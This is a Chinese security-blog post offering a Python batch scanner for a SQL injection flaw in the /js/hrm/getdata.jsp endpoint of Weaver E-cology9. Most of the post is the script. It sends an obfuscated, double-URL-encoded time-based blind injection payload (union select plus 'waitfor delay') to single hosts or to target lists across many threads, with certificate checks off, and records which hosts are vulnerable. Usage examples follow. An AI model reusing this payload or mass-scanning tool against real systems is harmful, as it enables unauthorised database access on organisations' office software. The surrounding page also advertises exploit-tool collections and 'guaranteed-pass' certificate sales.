泛微E-cology9中/js/hrm/getdata.jsp接口SQL 注入漏洞(DVB-2025-9428/QVD-2025-23834)漏洞检测工具

02568

泛微E-cology9中/js/hrm/getdata.jsp接口SQL 注入漏洞(DVB-2025-9428/QVD-2025-23834)

图片

🔧 功能特性

    • 支持单个 URL 和批量 URL 文件输入

    • 基于响应时间判断是否存在 SQL 注入

    • 多线程并发检测,提升扫描效率

    • 自动协议补全与端口识别(如 http/https)

    • 支持保存检测结果

    • 支持详细输出模式(verbose)

🛠 使用方法

ecology9_sqli.py

import requests
import time
import argparse
from urllib.parse import urljoin
from concurrent.futures import ThreadPoolExecutor

# 禁用SSL警告
requests.packages.urllib3.disable_warnings()

def check_vulnerability(target):
    """检测单个目标是否存在漏洞"""
    # 构造两个检测请求的URL
    payload = "/js/hrm/getdata.jsp?cmd=savect&arg0=%25%33%31%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%33%33%25%32%63%25%33%34%25%32%63%25%33%35%25%32%63%25%33%36%25%33%62%25%37%32%25%36%35%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%37%35%25%37%32%25%36%35%25%33%62%25%36%34%25%36%35%25%36%33%25%36%63%25%36%31%25%37%32%25%36%35%25%32%30%25%34%30%25%37%34%25%32%30%25%36%65%25%37%36%25%36%31%25%37%32%25%36%33%25%36%38%25%36%31%25%37%32%25%32%38%25%33%31%25%33%30%25%33%30%25%32%39%25%32%66%25%32%61%25%32%61%25%32%66%25%37%33%25%36%35%25%37%34%25%32%30%25%34%30%25%37%34%25%33%64%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%36%33%25%36%38%25%36%31%25%37%32%25%32%38%25%33%34%25%33%38%25%32%39%25%32%63%25%36%33%25%36%38%25%36%31%25%37%32%25%32%38%25%33%35%25%33%38%25%32%39%25%32%63%25%36%33%25%36%38%25%36%31%25%37%32%25%32%38%25%33%34%25%33%38%25%32%39%25%32%63%25%36%33%25%36%38%25%36%31%25%37%32%25%32%38%25%33%35%25%33%38%25%32%39%25%32%63%25%36%33%25%36%38%25%36%31%25%37%32%25%32%38%25%33%35%25%33%34%25%32%39%25%32%39%25%32%66%25%32%61%25%32%61%25%32%66%25%37%37%25%36%31%25%36%39%25%37%34%25%36%36%25%36%66%25%37%32%25%32%30%25%36%34%25%36%35%25%36%63%25%36%31%25%37%39%25%32%30%25%34%30%25%37%34%25%32%66%25%32%61%25%32%30%25%36%34%25%36%34%25%32%30%25%36%63%25%36%35%25%36%36%25%37%34%25%32%30%25%36%38%25%36%31%25%37%33%25%36%38%25%32%30%25%36%61%25%36%66%25%36%39%25%36%65%25%32%30%25%32%61%25%32%66%25%32%64%25%32%64%25%32%62"

    url1 = urljoin(target, payload)
    url2 = urljoin(target, payload)
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    
    try:
        # 发送第一个请求 (SLEEP 6秒)
        start_time = time.time()
        r1 = requests.get(
            url1, 
            headers=headers, 
            verify=False, 
            timeout=15,
            allow_redirects=True
        )
        elapsed1 = time.time() - start_time
        
        # 发送第二个请求 (SLEEP 0秒)
        # start_time = time.time()
        # r2 = requests.get(
        #     url2, 
        #     headers=headers, 
        #     verify=False, 
        #     timeout=15,
        #     allow_redirects=False
        # )
        # elapsed2 = time.time() - start_time
        
        # 检查漏洞条件
        condition1 = r1.status_code == 200 and elapsed1 >= 6.0 and elapsed1 <= 7.0 # 考虑网络延迟
        
        if condition1:
            return target, True, f"响应时间: {elapsed1:.2f}s"
        else:
            return target, False, f"条件不满足"
            
    except Exception as e:
        return target, False, f"请求失败"

def normalize_target(target):
    """规范化目标URL,添加缺失的协议头"""
    target = target.strip()
    
    # 如果目标已有协议头,直接返回
    if target.startswith("http://") or target.startswith("https://"):
        return [target]
    
    # 如果目标包含端口号,保留端口号
    if ":" in target and not target.startswith("["):  # 排除IPv6地址
        host, port = target.rsplit(":", 1)
        if port.isdigit():  # 确认是端口号
            return [
                f"http://{host}:{port}",
                f"https://{host}:{port}"
            ]
    
    # 普通目标尝试两种协议
    return [
        f"http://{target}",
        f"https://{target}"
    ]

def main():
    
    BANNER = r"""泛微E-cology9 SQL注入漏洞批量检测工具
GitHub: https://github.com/YanC1e/ecology9_sqli
============================================================"""
    
    # 创建参数解析器
    parser = argparse.ArgumentParser(
        description=BANNER,
        formatter_class=argparse.RawTextHelpFormatter,
        add_help=False
    )
    
    # 添加参数
    parser.add_argument("-h", "--help", action="store_true", help=" 显示帮助信息")
    parser.add_argument("-t", "--target", help="指定单个目标URL")
    parser.add_argument("-f", "--file", help="从文件读取目标URL列表")
    parser.add_argument("-o", "--output", help="将存在漏洞的地址保存到文件")
    parser.add_argument("-T", "--threads", type=int, default=5, help="设置并发线程数 (默认: 5)")
    parser.add_argument("-v", "--verbose", action="store_true", help="显示详细输出信息")
    
    args = parser.parse_args()
    
    # 自定义帮助显示
    if args.help or (not args.target and not args.file):
        print(BANNER)
        print("\n使用方法:")
        print("  python3 1.py [-h] [-t TARGET] [-f FILE] [-o OUTPUT] [-T THREADS] [-v]")
        print("\n选项:")
        print("  -h, --help            显示此帮助信息")
        print("  -t, --target TARGET   指定单个目标URL")
        print("  -f, --file FILE       从文件读取目标URL列表")
        print("  -o, --output OUTPUT   将存在漏洞的地址保存到文件")
        print("  -T, --threads THREADS 设置并发线程数 (默认: 5)")
        print("  -v, --verbose         显示详细输出信息")
        print("\n示例:")
        print("  扫描单个目标: python3 1.py -t http://example.com")
        print("  批量扫描目标: python3 1.py -f targets.txt -o results.txt -T 10")
        print("  显示详细信息: python3 1.py -t http://example.com -v")
        return
    
    # 收集目标列表
    targets = []
    
    # 处理单个目标
    if args.target:
        targets.extend(normalize_target(args.target))
    
    # 处理文件中的目标
    if args.file:
        try:
            with open(args.file, 'r') as f:
                for line in f:
                    if line.strip():
                        targets.extend(normalize_target(line))
        except FileNotFoundError:
            print(f"[-] 错误: 文件 '{args.file}' 不存在")
            return
    
    # 去重并打印目标列表
    targets = list(set(targets))
    
    if args.verbose:
        print("[*] 目标列表:")
        for t in targets:
            print(f"  - {t}")
    
    print(f"[*] 开始扫描 {len(targets)} 个目标, 线程数: {args.threads}")
    
    vulnerable_targets = []  # 只保存存在漏洞的地址
    vulnerable_count = 0
    
    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = [executor.submit(check_vulnerability, target) for target in targets]
        
        for future in futures:
            target, is_vuln, msg = future.result()
            status = "存在漏洞" if is_vuln else "安全"
            result_str = f"[{status}] {target} - {msg}"
            
            if is_vuln:
                vulnerable_count += 1
                # 漏洞目标用红色高亮显示
                result_str = f"\033[91m{result_str}\033[0m"
                # 只保存存在漏洞的地址
                vulnerable_targets.append(target)
            
            print(result_str)
    
    # 保存结果 - 只保存存在漏洞的地址
    if args.output and vulnerable_targets:
        with open(args.output, 'w') as f:
            f.write("\n".join(vulnerable_targets))
        print(f"\n[+] 漏洞地址已保存到: {args.output} (共 {len(vulnerable_targets)} 条)")
    elif args.output and not vulnerable_targets:
        print("\n[-] 未发现漏洞,未生成结果文件")
    
    # 打印统计信息
    print(f"\n[+] 扫描完成! 共扫描 {len(targets)} 个目标, 发现 {vulnerable_count} 个存在漏洞")

if __name__ == "__main__":
    main()

依赖环境

    • Python 3.6+

    • requests 安装依赖:

pip install requests

基本参数说明

参数说明
-t --target指定单个目标 URL
-f --file从文件中批量导入目标 URL,每行一个
-o --output将扫描结果输出保存到指定文件
-T --threads并发线程数(默认:5)
-v --verbose显示详细目标输出信息

使用示例

检查单个目标

python ecology9_sqli.py.py -t http://example.com

批量检测目标(指定线程10)

python ecology9_sqli.py.py -f targets.txt -T 10

保存结果并显示详细信息并保存结果

python3 ecology9_sqli.py -f targets.txt -o result.txt -v

© 版权声明
文章版权归作者所有,转载请标明出处。
THE END
漏洞情报
喜欢就支持一下吧
点赞8 分享
李白的头像李白你好-实战攻防李白你好永久会员
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】李白你好-实战攻防李白你好
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】
4个月前 2400
Vshell-listens李白你好-实战攻防李白你好
Vshell-listens
Vshell-listens
11个月前 1750
证书列表【包下证系列】李白你好-实战攻防李白你好
证书列表【包下证系列】
证书列表【包下证系列】
4个月前 1467
2025渗透攻防相关工具集合李白你好-实战攻防李白你好
2025渗透攻防相关工具集合
2025渗透攻防相关工具集合
5个月前 1096
红队武器库漏洞利用工具合集整理李白你好-实战攻防李白你好
红队武器库漏洞利用工具合集整理
红队武器库漏洞利用工具合集整理
10个月前 1024
CISP系列证书低价促销【保过】李白你好-实战攻防李白你好
CISP系列证书低价促销【保过】
CISP系列证书低价促销【保过】
3个月前 859
相关推荐
泛微E-cology9中/js/hrm/getdata.jsp接口SQL 注入漏洞(DVB-2025-9428/QVD-2025-23834)漏洞检测工具李白你好-实战攻防李白你好
泛微E-cology9中/js/hrm/getdata.jsp接口SQL 注入漏洞(DVB-2025-9428/QVD-2025-23834)漏洞检测工具
泛微E-cology9中/js/hrm/getdata.jsp接口SQL 注入漏洞(DVB-2025-9428/QVD-2025-23834)漏洞检测...
25天前 256
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)李白你好-实战攻防李白你好
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)
3个月前 254
全量漏洞文库新增漏洞-2025.03.18李白你好-实战攻防李白你好
全量漏洞文库新增漏洞-2025.03.18
全量漏洞文库新增漏洞-2025.03.18
3个月前 245
Ollama未授权访问漏洞(CNVD-2025-04094)李白你好-实战攻防李白你好
Ollama未授权访问漏洞(CNVD-2025-04094)
Ollama未授权访问漏洞(CNVD-2025-04094)
3个月前 220
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞李白你好-实战攻防李白你好
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞
3个月前 213
CVE-编号查找工具,用于查询和搜索CVE漏洞信息。李白你好-实战攻防李白你好
CVE-编号查找工具,用于查询和搜索CVE漏洞信息。
CVE-编号查找工具,用于查询和搜索CVE漏洞信息。
2个月前 207
深信服运维安全管理系统RCE漏洞李白你好-实战攻防李白你好
深信服运维安全管理系统RCE漏洞
深信服运维安全管理系统RCE漏洞
11天前 202
Guns后台任意文件上传漏洞李白你好-实战攻防李白你好
Guns后台任意文件上传漏洞
Guns后台任意文件上传漏洞
5个月前 201
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    暂无评论内容